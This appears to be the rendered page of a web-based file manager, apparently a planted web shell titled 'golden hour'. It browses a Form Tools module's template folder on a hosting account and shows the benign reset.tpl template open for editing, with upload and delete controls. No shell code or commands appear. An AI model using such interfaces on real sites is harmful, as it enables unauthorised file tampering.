golden hour
/home/phakp/public_html/formtools/modules/export_manager/templates
⬆️ Go Up
Upload
File/Folder
Size
Actions
export_groups
-
Del
OK
export_options_html.tpl
3.68 KB
Del
OK
help.tpl
544 B
Del
OK
index.html
39 B
Del
OK
index.tpl
4.58 KB
Del
OK
reset.tpl
773 B
Del
OK
settings.tpl
2.88 KB
Del
OK
Edit: reset.tpl
{ft_include file='modules_header.tpl'} <table cellpadding="0" cellspacing="0"> <tr> <td width="45"><a href="./"><img src="images/icon_export.gif" border="0" width="34" height="34" /></a></td> <td class="title"> <a href="../../admin/modules">{$LANG.word_modules}</a> <span class="joiner">»</span> <a href="./">{$L.module_name}</a> <span class="joiner">»</span> {$L.phrase_reset_defaults} </td> </tr> </table> {ft_include file='messages.tpl'} <div class="margin_bottom_large"> {$L.text_reset_defaults} </div> <form action="{$same_page}" method="post"> <p> <input type="submit" name="reset" value="{$L.phrase_reset_defaults}" /> </p> </form> {ft_include file='modules_footer.tpl'}
Save